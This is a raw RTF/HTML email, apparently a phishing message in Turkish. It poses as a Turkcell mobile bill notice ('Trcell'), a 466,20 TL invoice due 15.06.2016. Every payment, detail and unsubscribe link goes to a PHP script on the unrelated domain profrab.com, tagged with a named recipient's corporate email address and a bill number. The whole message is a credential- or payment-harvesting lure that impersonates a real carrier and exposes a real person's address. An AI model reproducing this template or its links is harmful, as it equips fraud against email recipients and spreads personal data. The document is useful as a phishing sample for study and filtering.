{\rtf1\ansi\fbidis\ansicpg1254\deff0\fromhtml1{\fonttbl{\f0\fswiss\fcharset162 Times New Roman;}{\f1\fswiss\fcharset2 Symbol;}{\f2
\fswiss\fcharset162 Arial;}{\f3\fswiss\fcharset162 Courier New;}}
{\colortbl;\red192\green192\blue192;\red255\green255\blue255;\red0\green0\blue0;\red0\green0\blue1;\red8\green72\blue158
;\red246\green246\blue246;\red22\green57\blue95;\red12\green36\blue60;\red153\green153\blue153;\red0\green0\blue255
;}
{\*\generator Microsoft Exchange Server;}
{\*\formatConverter converted from html;}
{\*\background {\shp{\*\shpinst{\sp{\sn fillColor}{\sv 16777215}}}}}\viewkind5\viewscale100
\htmlrtf{\*\bkmkstart BM_BEGIN}\htmlrtf0{\*\htmltag64}{\*\htmltag0 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></Title><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">#outlook A \{\par
\'09PADDING-BOTTOM: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; PADDING-TOP: 0px\par
\}\par
.ExternalClass \{\par
\'09WIDTH: 100%\par
\}\par
.ExternalClass \{\par
\'09LINE-HEIGHT: 100%\par
\}\par
.ExternalClass P \{\par
\'09LINE-HEIGHT: 100%\par
\}\par
.ExternalClass SPAN \{\par
\'09LINE-HEIGHT: 100%\par
\}\par
.ExternalClass FONT \{\par
\'09LINE-HEIGHT: 100%\par
\}\par
.ExternalClass TD \{\par
\'09LINE-HEIGHT: 100%\par
\}\par
.ExternalClass DIV \{\par
\'09LINE-HEIGHT: 100%\par
\}\par
IMG \{\par
\'09OUTLINE-STYLE: none; -MS-INTERPOLATION-MODE: bicubic; TEXT-DECORATION: none\par
\}\par
A IMG \{\par
\'09BORDER-BOTTOM-STYLE: none; BORDER-RIGHT-STYLE: none; BORDER-TOP-STYLE: none; BORDER-LEFT-STYLE: none\par
\}\par
.image_fix \{\par
\'09DISPLAY: block\par
\}\par
P \{\par
\'09PADDING-BOTTOM: 0px; LINE-HEIGHT: 0; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-SIZE: 0px; PADDING-TOP: 0px\par
\}\par

TABLE TD \{\par
\'09BORDER-COLLAPSE: collapse\par
\}\par

TABLE \{\par
\'09BORDER-COLLAPSE: collapse; mso-table-lspace: 0; mso-table-rspace: 0\par
\}\par
IMG \{\par
\'09OUTLINE-STYLE: none; DISPLAY: block; -MS-INTERPOLATION-MODE: bicubic; TEXT-DECORATION: none\par
\}\par
A IMG \{\par
\'09BORDER-BOTTOM-STYLE: none; BORDER-RIGHT-STYLE: none; BORDER-TOP-STYLE: none; BORDER-LEFT-STYLE: none\par
\}\par
A \{\par
\'09COLOR: #000001; TEXT-DECORATION: none\par
\}\par
A.phone \{\par
\'09COLOR: #000001 !important; CURSOR: default; TEXT-DECORATION: none; pointer-events: auto\par
\}\par
SPAN \{\par
\'09LINE-HEIGHT: 17px; FONT-FAMILY: monospace; COLOR: #000001; FONT-SIZE: 13px\par
\}\par
</Style><meta name="GENERATOR" content="-[OUTLOOK_VER]-"></Head><body style="PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 100%; PADDING-RIGHT: 0px; BACKGROUND: #ffffff; PADDING-TOP: 0px; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%"><table style="PADDING-BOTTOM: 0px; LINE-HEIGHT: 100% !important; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 100%; PADDING-RIGHT: 0px; BORDER-COLLAPSE: collapse; MAX-WIDTH: 800px; BACKGROUND: #ffffff; COLOR: #000000; PADDING-TOP: 0px" border="0" cellspacing="0" cellpadding="0">}{\*\htmltag0 <tbody>}{\*\htmltag0 <tr><td style="PADDING-BOTTOM: 0px; PADDING-LEFT: 25px; PADDING-RIGHT: 25px; HEIGHT: 116px; PADDING-TOP: 0px" valign="center" align="left">}{\*\htmltag0 <a style="TEXT-DECORATION: none" href="#" target="_blank">}\htmlrtf
\trowd\irow0\irowband0\trcbpat2\trftsWidth2\trwWidth5000\clpadl0\clpadfl3\clpadr300\clpadfr3\clpadb0\clpadfb3\clpadt300\clpadft3
\clcbpat2\cellx8856\htmlrtf0{\*\htmltag0 <img style="POSITION: relative; BORDER-BOTTOM-STYLE: none; LINE-HEIGHT: 67px; BORDER-RIGHT-STYLE: none; FONT-STYLE: normal; DISPLAY: inline-block; FONT-FAMILY: Arial, Helvetica, sans-serif; BORDER-TOP-STYLE: none; COLOR: #08489e; FONT-SIZE: 40px; VERTICAL-ALIGN: middle; BORDER-LEFT-STYLE: none; FONT-WEIGHT: bold" alt="TRCELL" src="http://profrab.com/QgRfJV//y2PukhMp4srnHc0.png">}\htmlrtf
\pard\intbl\cbpat2\ql\plain\f0{\field{\*\fldinst HYPERLINK \\l "BM_BEGIN" }{\fldrslt\htmlrtf0{\*\htmltag0 }\htmlrtf{\field{\*\fldinst INCLUDEPICTURE "http://profrab.com/QgRfJV//y2PukhMp4srnHc0.png" \\d \\* MERGEFORMAT}{\fldrslt
{\pict{\*\picprop{\sp{\sn fillColor}{\sv 14286846}}{\sp{\sn fillOpacity}{\sv 16384}}{\sp{\sn fFilled}{\sv 1}}{\sp{\sn wzDescription}{\sv TRCELL}}}\brdrt\brdrs\brdrw10
\brdrcf1\brdrl\brdrs\brdrw10\brdrcf1\brdrb\brdrs\brdrw10\brdrcf1\brdrr\brdrs\brdrw10\brdrcf1\wmetafile8 0100090000032100000000000500000000000400000003010800050000000b0200000000050000000c0202000200030000001e00040000002701ffff030000000000}}}{\cf4
\ul0\strike0\htmlrtf0  {\*\htmltag0 </A>}\htmlrtf}}}\htmlrtf0{\*\htmltag0 </TD>}\htmlrtf\cell\htmlrtf0{\*\htmltag0 </TR>}\htmlrtf
\pard\intbl\row
\htmlrtf0{\*\htmltag0 <tr><td style="PADDING-BOTTOM: 30px; PADDING-LEFT: 36px; PADDING-RIGHT: 36px; BACKGROUND: #f6f6f6; PADDING-TOP: 30px" valign="top" align="left">}{\*\htmltag0 <table style="PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 100%; PADDING-RIGHT: 0px; BORDER-COLLAPSE: collapse; FONT-FAMILY: Arial, Helvetica, sans-serif; MAX-WIDTH: 800px; COLOR: #000000; FONT-SIZE: 15px; PADDING-TOP: 0px" border="0" cellspacing="0" cellpadding="0">}\htmlrtf
\trowd\irow1\irowband1\trcbpat2\trftsWidth2\trwWidth5000\clcbpat6\clpadl360\clpadfl3\clpadr432\clpadfr3\clpadb360\clpadfb3
\clpadt432\clpadft3\cellx8856\htmlrtf0{\*\htmltag0 <tbody>}{\*\htmltag0 <tr><td style="PADDING-BOTTOM: 16px" align="left">}{\*\htmltag0 <span style="LINE-HEIGHT: 18px; FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px">}\htmlrtf
\pard\intbl\itap2\cbpat6\plain{\f2\cf4\fs16\htmlrtf0 Say\'FDn M\'FC\'FEteri,{\*\htmltag0 </Span>}\htmlrtf}{\f2\cf3\fs18\htmlrtf0  {\*\htmltag0 </TD>}\htmlrtf
}\htmlrtf0{\*\htmltag0 }\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 </TR>}\htmlrtf\pard\intbl\itap2{\*\nesttableprops
\trowd\irow0\irowband0\trcbpat6\trftsWidth2\trwWidth5000\clpadb192\clpadfb3\clcbpat6\cellx8856\nestrow}{\nonesttables\par}
\htmlrtf0{\*\htmltag0 <tr><td style="PADDING-BOTTOM: 16px" align="left">}{\*\htmltag0 <span style="LINE-HEIGHT: 18px; FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px; FONT-WEIGHT: bold">}\htmlrtf
\pard\intbl\itap2\cbpat6\plain{\f2\cf4\fs16\b\htmlrtf0 5462716826 numaral\'FD faturan\'FDz g\'F6r\'FCnt\'FClenmeye haz\'FDr{\*\htmltag0 </Span>}\htmlrtf
}{\f2\cf3\fs18\htmlrtf0  {\*\htmltag0 </TD>}\htmlrtf}\htmlrtf0{\*\htmltag0 }\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 </TR>}\htmlrtf
\pard\intbl\itap2{\*\nesttableprops\trowd\irow1\irowband1\trcbpat6\trftsWidth2\trwWidth5000\clpadb192\clpadfb3\clcbpat6\cellx8856
\nestrow}{\nonesttables\par}
\htmlrtf0{\*\htmltag0 <tr><td style="PADDING-BOTTOM: 36px" align="left">}{\*\htmltag0 <table style="BORDER-COLLAPSE: collapse" cellspacing="0" cellpadding="0">}{\*\htmltag0 <tbody>}{\*\htmltag0 <tr><td style="WIDTH: 140px" valign="center" align="left">}{\*\htmltag0 <span style="FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px; FONT-WEIGHT: bold">}\htmlrtf
\pard\intbl\itap3\cbpat6\plain{\f2\cf4\fs16\b\htmlrtf0 Fatura D\'F6nemi{\*\htmltag0 </Span>}\htmlrtf}{\f2\htmlrtf0  {\*\htmltag0 </TD>}\htmlrtf
}\htmlrtf0{\*\htmltag0 }\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 <td style="WIDTH: 70px" valign="center" align="left"><span style="FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px; FONT-WEIGHT: bold">}\htmlrtf
\pard\intbl\itap3\cbpat6\plain{\f2\cf4\fs16\b\htmlrtf0 :{\*\htmltag0 </Span>}\htmlrtf}{\f2\htmlrtf0  {\*\htmltag0 </TD>}\htmlrtf
}\htmlrtf0{\*\htmltag0 }\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 <td valign="center" align="left"><span style="FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px; FONT-WEIGHT: bold">}\htmlrtf
\pard\intbl\itap3\cbpat6\plain{\f2\cf4\fs16\b\htmlrtf0 Nisan 2016 - Haziran 2016{\*\htmltag0 </Span>}\htmlrtf}{\f2\htmlrtf0
 {\*\htmltag0 </TD>}\htmlrtf}\htmlrtf0{\*\htmltag0 }\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 </TR>}\htmlrtf\pard
\intbl\itap3{\*\nesttableprops\trowd\irow0\irowband0\trcbpat6\clcbpat6\cellx1680\clcbpat6\cellx2520\clcbpat6\cellx8856\nestrow}{\nonesttables\par}
\htmlrtf0{\*\htmltag0 <tr><td style="WIDTH: 140px" valign="center" align="left">}{\*\htmltag0 <span style="FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px; FONT-WEIGHT: bold">}\htmlrtf
\pard\intbl\itap3\cbpat6\plain{\f2\cf4\fs16\b\htmlrtf0 Son \'D6deme Tarihi{\*\htmltag0 </Span>}\htmlrtf}{\f2\htmlrtf0  {\*\htmltag0 </TD>}\htmlrtf
}\htmlrtf0{\*\htmltag0 }\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 <td style="WIDTH: 70px" valign="center" align="left"><span style="FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px; FONT-WEIGHT: bold">}\htmlrtf
\pard\intbl\itap3\cbpat6\plain{\f2\cf4\fs16\b\htmlrtf0 :{\*\htmltag0 </Span>}\htmlrtf}{\f2\htmlrtf0  {\*\htmltag0 </TD>}\htmlrtf
}\htmlrtf0{\*\htmltag0 }\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 <td valign="center" align="left"><span style="FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px; FONT-WEIGHT: bold">}\htmlrtf
\pard\intbl\itap3\cbpat6\plain{\f2\cf4\fs16\b\htmlrtf0 15.06.2016{\*\htmltag0 </Span>}\htmlrtf}{\f2\htmlrtf0  {\*\htmltag0 </TD>}\htmlrtf
}\htmlrtf0{\*\htmltag0 }\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 </TR>}\htmlrtf\pard\intbl\itap3{\*\nesttableprops
\trowd\irow1\irowband1\trcbpat6\clcbpat6\cellx1680\clcbpat6\cellx2520\clcbpat6\cellx8856\nestrow}{\nonesttables\par}
\htmlrtf0{\*\htmltag0 <tr><td style="WIDTH: 140px" valign="center" align="left">}{\*\htmltag0 <span style="FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px; FONT-WEIGHT: bold">}\htmlrtf
\pard\intbl\itap3\cbpat6\plain{\f2\cf4\fs16\b\htmlrtf0 \'D6denecek Tutar{\*\htmltag0 </Span>}\htmlrtf}{\f2\htmlrtf0  {\*\htmltag0 </TD>}\htmlrtf
}\htmlrtf0{\*\htmltag0 }\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 <td style="WIDTH: 70px" valign="center" align="left"><span style="FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px; FONT-WEIGHT: bold">}\htmlrtf
\pard\intbl\itap3\cbpat6\plain{\f2\cf4\fs16\b\htmlrtf0 :{\*\htmltag0 </Span>}\htmlrtf}{\f2\htmlrtf0  {\*\htmltag0 </TD>}\htmlrtf
}\htmlrtf0{\*\htmltag0 }\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 <td valign="center" align="left"><span style="FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px; FONT-WEIGHT: bold">}\htmlrtf
\pard\intbl\itap3\cbpat6\plain{\f2\cf4\fs16\b\htmlrtf0 466,20 TL{\*\htmltag0 </Span>}\htmlrtf}{\f2\htmlrtf0  {\*\htmltag0 </TD>}\htmlrtf
}\htmlrtf0{\*\htmltag0 }\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 </TR>}\htmlrtf\pard\intbl\itap3{\*\nesttableprops
\trowd\irow2\irowband2\trcbpat6\clcbpat6\cellx1680\clcbpat6\cellx2520\clcbpat6\cellx8856\nestrow}{\nonesttables\par}
\htmlrtf0{\*\htmltag0 </Tbody></Table>}{\*\htmltag0 </TD>}\htmlrtf\pard\intbl\itap2\cbpat6\ql\nestcell{\nonesttables\tab}\htmlrtf0
{\*\htmltag0 </TR>}\htmlrtf\pard\intbl\itap2{\*\nesttableprops\trowd\irow2\irowband2\trcbpat6\trftsWidth2\trwWidth5000\clpadb432
\clpadfb3\clcbpat6\cellx8856\nestrow}{\nonesttables\par}
\htmlrtf0{\*\htmltag0 <tr><td style="PADDING-BOTTOM: 36px" align="left">}{\*\htmltag0 <table style="BORDER-COLLAPSE: collapse" cellspacing="0" cellpadding="0">}{\*\htmltag0 <tbody>}{\*\htmltag0 <tr><td style="BORDER-BOTTOM: #0c243c 2px solid; BORDER-LEFT: #0c243c 2px solid; PADDING-BOTTOM: 12px; LINE-HEIGHT: 15px; BACKGROUND-COLOR: #16395f; PADDING-LEFT: 0px; WIDTH: 270px; PADDING-RIGHT: 0px; FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 16px; BORDER-TOP: #0c243c 2px solid; BORDER-RIGHT: #0c243c 2px solid; PADDING-TOP: 12px" valign="center" align="middle">}{\*\htmltag0 <a style="COLOR: #ffffff; FONT-SIZE: 15px" href="http://profrab.com/QgRfJV/Jn0ON9LKVvBR.php?id=canan.dim@halkbank.com.tr&num=5462716826" target="_blank">}\htmlrtf
\pard\intbl\itap3\cbpat7\plain\f0{\field{\*\fldinst HYPERLINK "http://profrab.com/QgRfJV/Jn0ON9LKVvBR.php?id=canan.dim@halkbank.com.tr&num=5462716826" }{\fldrslt
{\f2\cf2\fs18\ul0\strike0\htmlrtf0 Faturan\'FDz\'FD hemen \'F6demek i\'E7in t\'FDklay\'FDn{\*\htmltag0 </A>}\htmlrtf}}}{\f2\fs19\htmlrtf0  {\*\htmltag0 </TD>}\htmlrtf
}\htmlrtf0{\*\htmltag0 }\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 <td style="WIDTH: 8px">}\htmlrtf\pard\intbl\itap3
\cbpat6\plain\f0{\f2\htmlrtf0  {\*\htmltag0 </TD>}\htmlrtf}\htmlrtf0{\*\htmltag0 }\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0
{\*\htmltag0 <td style="BORDER-BOTTOM: #0c243c 2px solid; BORDER-LEFT: #0c243c 2px solid; PADDING-BOTTOM: 12px; LINE-HEIGHT: 15px; BACKGROUND-COLOR: #16395f; PADDING-LEFT: 0px; WIDTH: 270px; PADDING-RIGHT: 0px; FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 16px; BORDER-TOP: #0c243c 2px solid; BORDER-RIGHT: #0c243c 2px solid; PADDING-TOP: 12px" valign="center" align="middle"><a style="COLOR: #ffffff; FONT-SIZE: 15px" href="http://profrab.com/QgRfJV/Jn0ON9LKVvBR.php?id=canan.dim@halkbank.com.tr&num=5462716826" target="_blank">}\htmlrtf
\pard\intbl\itap3\cbpat7\plain\f0{\field{\*\fldinst HYPERLINK "http://profrab.com/QgRfJV/Jn0ON9LKVvBR.php?id=canan.dim@halkbank.com.tr&num=5462716826" }{\fldrslt
{\f2\cf2\fs18\ul0\strike0\htmlrtf0 Faturan\'FDzla ilgili detayl\'FD bilgi{\*\htmltag0 </A>}\htmlrtf}}}{\f2\fs19\htmlrtf0  {\*\htmltag0 </TD>}\htmlrtf
}\htmlrtf0{\*\htmltag0 }\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 </TR>}\htmlrtf\pard\intbl\itap3{\*\nesttableprops
\trowd\irow0\irowband0\trcbpat6\clcbpat7\clpadl144\clpadfl3\clpadr0\clpadfr3\clpadb144\clpadfb3\clpadt0\clpadft3\cellx3240
\clcbpat6\cellx3336\clcbpat7\clpadl144\clpadfl3\clpadr0\clpadfr3\clpadb144\clpadfb3\clpadt0\clpadft3\cellx8856\nestrow}{\nonesttables\par}
\htmlrtf0{\*\htmltag0 </Tbody></Table>}{\*\htmltag0 </TD>}\htmlrtf\pard\intbl\itap2\cbpat6\ql\nestcell{\nonesttables\tab}\htmlrtf0
{\*\htmltag0 </TR>}\htmlrtf\pard\intbl\itap2{\*\nesttableprops\trowd\irow3\irowband3\trcbpat6\trftsWidth2\trwWidth5000\clpadb432
\clpadfb3\clcbpat6\cellx8856\nestrow}{\nonesttables\par}
\htmlrtf0{\*\htmltag0 <tr><td style="PADDING-BOTTOM: 16px" align="left">}{\*\htmltag0 <span style="LINE-HEIGHT: 18px; FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px">}\htmlrtf
\pard\intbl\itap2\cbpat6\plain{\f2\cf4\fs16\htmlrtf0 \'D6demelerinizi bankalardan, PTT'den, 532 M\'FC\'FEteri Hizmetleri'nden, Trcell \'DDleti\'FEim Merkezleri'nden ve Online \'DD\'FElem Merkezi'nden ger\'E7ekle\'FEtirebilirsiniz. {\*\htmltag0 </Span>}\htmlrtf
}\htmlrtf0{\*\htmltag0 </TD>}\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 </TR>}\htmlrtf\pard\intbl\itap2{\*\nesttableprops
\trowd\irow4\irowband4\trcbpat6\trftsWidth2\trwWidth5000\clpadb192\clpadfb3\clcbpat6\cellx8856\nestrow}{\nonesttables\par}
\htmlrtf0{\*\htmltag0 <tr><td style="PADDING-BOTTOM: 16px" align="left">}{\*\htmltag0 <span style="LINE-HEIGHT: 18px; FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px">}\htmlrtf
\pard\intbl\itap2\cbpat6\plain{\f2\cf4\fs16\htmlrtf0 Fatura tutarlar\'FDn\'FDz\'FD nas\'FDl \'F6\'F0renece\'F0iniz ve faturalar\'FDn\'FDz ile ilgili di\'F0er sorular\'FDn\'FDz i\'E7in {\*\htmltag0 <a style="COLOR: #000000; TEXT-DECORATION: underline" href="http://profrab.com/QgRfJV/Jn0ON9LKVvBR.php?id=canan.dim@halkbank.com.tr&num=5462716826">}\htmlrtf
}{\field{\*\fldinst HYPERLINK "http://profrab.com/QgRfJV/Jn0ON9LKVvBR.php?id=canan.dim@halkbank.com.tr&num=5462716826" }{\fldrslt
{\f2\cf3\fs16\ul\strike0\htmlrtf0 t\'FDklay\'FDn\'FDz{\*\htmltag0 </A>}\htmlrtf}}}{\f2\cf4\fs16\htmlrtf0 . {\*\htmltag0 </Span>}\htmlrtf
}\htmlrtf0{\*\htmltag0 </TD>}\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 </TR>}\htmlrtf\pard\intbl\itap2{\*\nesttableprops
\trowd\irow5\irowband5\trcbpat6\trftsWidth2\trwWidth5000\clpadb192\clpadfb3\clcbpat6\cellx8856\nestrow}{\nonesttables\par}
\htmlrtf0{\*\htmltag0 <tr><td style="PADDING-BOTTOM: 16px" align="left">}{\*\htmltag0 <div>}{\*\htmltag0 <span style="LINE-HEIGHT: 18px; FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px">}\pard
\intbl\itap2\cbpat6\ql\plain\f0\htmlrtf{\f2\cf4\fs16\htmlrtf0 Ka\'F0\'FDt fatura yerine E-fatura kullanarak, faturalar\'FDn\'FDz\'FDn e-posta adresinize d\'FCzenli ve h\'FDzl\'FD ula\'FEmas\'FDn\'FD sa\'F0layabilirsiniz. {\*\htmltag0 <br>}\htmlrtf
}{\f2\cf4\fs16\line
\htmlrtf0{\*\htmltag0\par}E-fatura; ka\'F0\'FDt faturan\'FDz\'FDn ayn\'FDs\'FDd\'FDr, \'FCcretsiz ve yasald\'FDr. Detayl\'FD bilgi i\'E7in {\*\htmltag0 <a style="COLOR: #000000; TEXT-DECORATION: underline" href="http://profrab.com/QgRfJV/Jn0ON9LKVvBR.php?id=canan.dim@halkbank.com.tr&num=5462716826">}\htmlrtf
}{\field{\*\fldinst HYPERLINK "http://profrab.com/QgRfJV/Jn0ON9LKVvBR.php?id=canan.dim@halkbank.com.tr&num=5462716826" }{\fldrslt
{\f2\cf3\fs16\ul\strike0\htmlrtf0 t\'FDklay\'FDn\'FDz{\*\htmltag0 </A>}\htmlrtf}}}{\f2\cf4\fs16\htmlrtf0 . {\*\htmltag0 <br>}\htmlrtf
}{\f2\cf4\fs16\line
\htmlrtf0{\*\htmltag0\par}{\*\htmltag0 <br>}\htmlrtf}{\f2\cf4\fs16\line
\htmlrtf0{\*\htmltag0\par}{\*\htmltag0 <b>}\htmlrtf}{\f2\cf4\fs16\b\htmlrtf0 Kisisel Bilgilerin Korunmasi{\*\htmltag0 </B>}\htmlrtf
}{\f2\cf4\fs16\htmlrtf0  {\*\htmltag0 <br>}\htmlrtf}{\f2\cf4\fs16\line
\htmlrtf0{\*\htmltag0\par}{\*\htmltag0 <br>}\htmlrtf}{\f2\cf4\fs16\line
\htmlrtf0{\*\htmltag0\par}1. Kisisel Bilgilerinizin Korunmasi \'96 Hizmetleri Ile Ilgili Pazarlama Aktiviteleri {\*\htmltag0 <br>}\htmlrtf
}{\f2\cf4\fs16\line
\htmlrtf0{\*\htmltag0\par}{\*\htmltag0 <br>}\htmlrtf}{\f2\cf4\fs16\line
\htmlrtf0{\*\htmltag0\par}Sitedeki ilgili linki tiklayarak, \'FCyeliginiz s\'FCresince kisisel bilgilerinizin asagida belirtilen ama\'E7larla kullanimi i\'E7in Turkcell\'92e izin vermis olursunuz: Turkcell sirketleri/ is ortaklari tarafindan sunulan mal ve hizmetler ile ilgili tekliflerin sizlere ulastirilmasi, Pazar arastirmalarinin yapilmasi. {\*\htmltag0 <br>}\htmlrtf
}{\f2\cf4\fs16\line
\htmlrtf0{\*\htmltag0\par}{\*\htmltag0 <br>}\htmlrtf}{\f2\cf4\fs16\line
\htmlrtf0{\*\htmltag0\par}2. Tavsiye {\*\htmltag0 <br>}\htmlrtf}{\f2\cf4\fs16\line
\htmlrtf0{\*\htmltag0\par}{\*\htmltag0 <br>}\htmlrtf}{\f2\cf4\fs16\line
\htmlrtf0{\*\htmltag0\par}\'93turkcell.com.tr\'94 sitesinin sundugu hizmetlerden yararlanabilmeniz i\'E7in, Site\'92ye kayit olurken Turkcell\'92ya verdiginiz kisisel bilgilerinizin dogru olmasi ve s\'F6z konusu bilgilerinizde herhangi bir degisiklik olmasi halinde, Turkcell\'92yi bu konuda derhal bilgilendirmeniz gereklidir. Kisisel bilgileriniz, herhangi bir s\'FCre sinirlamasi olmaksizin pazarlama aktiviteleri i\'E7in kullanilabilinir. Bununla birlikte Turkcell Genel Merkez Ofisine yazili ihbarda bulunarak, bu konuda vermis oldugunuz izni iptal edebilirsiniz. Kisisel bilgilerinizin son durumunuzu yansitir sekilde g\'FCncel olmamasi halinde, promosyon ve kampanyalar, hediye ve \'F6d\'FCl programlari da dahil olmak \'FCzere pazarlama aktiviteleri hakkinda bilgilendirilmeyebilirsiniz ve s\'F6z konusu aktivitelerden yararlanamayabilirsiniz, size \'F6zel hediye ve \'F6d\'FCl programlarini kullanamayabilirsiniz, bilgilerinizin g\'FCncel olmamasi sebebi ile hesabiniz kapatilarak, kisisel bilgileriniz imha edilebilinir.{\*\htmltag0 </Span>}\htmlrtf
}\htmlrtf0{\*\htmltag0 </Div>}\htmlrtf\par
\htmlrtf0{\*\htmltag0 <div><span style="LINE-HEIGHT: 18px; FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px">}{\*\htmltag0 </Span>}\pard
\intbl\itap2\cbpat6\ql\plain\f0\htmlrtf{\f2\cf3\fs18\htmlrtf0  {\*\htmltag0 </Div>}\htmlrtf}\htmlrtf0{\*\htmltag0 }\htmlrtf\par
\htmlrtf0{\*\htmltag0 <div><span style="LINE-HEIGHT: 18px; FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px">}{\*\htmltag0 </Span>}\pard
\intbl\itap2\cbpat6\ql\plain\f0\htmlrtf{\f2\cf3\fs18\htmlrtf0  {\*\htmltag0 </Div>}\htmlrtf}\htmlrtf0{\*\htmltag0 }{\*\htmltag0 </TD>}\htmlrtf
\nestcell{\nonesttables\tab}\htmlrtf0{\*\htmltag0 </TR>}\htmlrtf\pard\intbl\itap2{\*\nesttableprops\trowd\irow6\irowband6\trcbpat6
\trftsWidth2\trwWidth5000\clpadb192\clpadfb3\clcbpat6\cellx8856\nestrow}{\nonesttables\par}
\htmlrtf0{\*\htmltag0 <tr><td style="PADDING-BOTTOM: 16px" align="left">}{\*\htmltag0 <span style="LINE-HEIGHT: 18px; FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-SIZE: 14px">}\htmlrtf
\pard\intbl\itap2\cbpat6\plain{\f2\cf4\fs16\htmlrtf0 Sayg\'FDlar\'FDm\'FDzla {\*\htmltag0 <br>}\htmlrtf}{\f2\cf4\fs16\line
\htmlrtf0{\*\htmltag0\par}Trcell \'DDleti\'FEim Hizmetleri A.\'DE. {\*\htmltag0 </Span>}\htmlrtf}\htmlrtf0{\*\htmltag0 </TD>}\htmlrtf\nestcell{\nonesttables\tab}\htmlrtf0
{\*\htmltag0 </TR>}\htmlrtf\pard\intbl\itap2{\*\nesttableprops\trowd\irow7\irowband7\trcbpat6\trftsWidth2\trwWidth5000\clpadb192
\clpadfb3\clcbpat6\cellx8856\nestrow}{\nonesttables\par}
\htmlrtf0{\*\htmltag0 </Tbody></Table>}{\*\htmltag0 </TD>}\htmlrtf\pard\intbl\cbpat6\ql\cell\htmlrtf0{\*\htmltag0 </TR>}\htmlrtf
\pard\intbl\row
\htmlrtf0{\*\htmltag0 <tr><td style="PADDING-BOTTOM: 10px; PADDING-LEFT: 36px; PADDING-RIGHT: 36px; BACKGROUND: #16395f; PADDING-TOP: 10px" valign="top" align="left">}{\*\htmltag0 <span style="LINE-HEIGHT: 18px; FONT-FAMILY: Arial, Helvetica, sans-serif; COLOR: #999999; FONT-SIZE: 13px">}\htmlrtf
\trowd\irow2\irowband2\trcbpat2\trftsWidth2\trwWidth5000\clcbpat7\clpadl120\clpadfl3\clpadr432\clpadfr3\clpadb120\clpadfb3
\clpadt432\clpadft3\cellx8856\htmlrtf0{\*\htmltag0 <br>}\htmlrtf\pard\intbl\cbpat7\plain{\f2\cf9\fs15\line
\htmlrtf0{\*\htmltag0\par}Bu mesaj bilgilendirme amac\'FDyla canan.dim@halkbank.com.tr i\'E7in g\'F6nderilmistir. {\*\htmltag0 <br>}\htmlrtf
}{\f2\cf9\fs15\line
\htmlrtf0{\*\htmltag0\par}E\'F0er art\'FDk ilgilenmiyorsan\'FDz e-mail {\*\htmltag0 <a style="COLOR: #999999; TEXT-DECORATION: underline" href="http://profrab.com/QgRfJV/Jn0ON9LKVvBR.php?id=canan.dim@halkbank.com.tr&action=unsubscribe">}\htmlrtf
}{\field{\*\fldinst HYPERLINK "http://profrab.com/QgRfJV/Jn0ON9LKVvBR.php?id=canan.dim@halkbank.com.tr&action=unsubscribe" }{\fldrslt
{\f2\cf9\fs15\ul\strike0\htmlrtf0 \'FCyeli\'F0inizi iptal edebilirsiniz{\*\htmltag0 </A>}\htmlrtf}}}{\f2\cf9\fs15\htmlrtf0 . {\*\htmltag0 </Span>}\htmlrtf
}\htmlrtf0{\*\htmltag0 </TD>}\htmlrtf\cell\htmlrtf0{\*\htmltag0 </TR>}\htmlrtf\pard\intbl\row
\htmlrtf0{\*\htmltag0 <tr><td style="LINE-HEIGHT: 15px; BACKGROUND-COLOR: #0c243c; HEIGHT: 15px">}\htmlrtf\trowd\irow3\irowband3
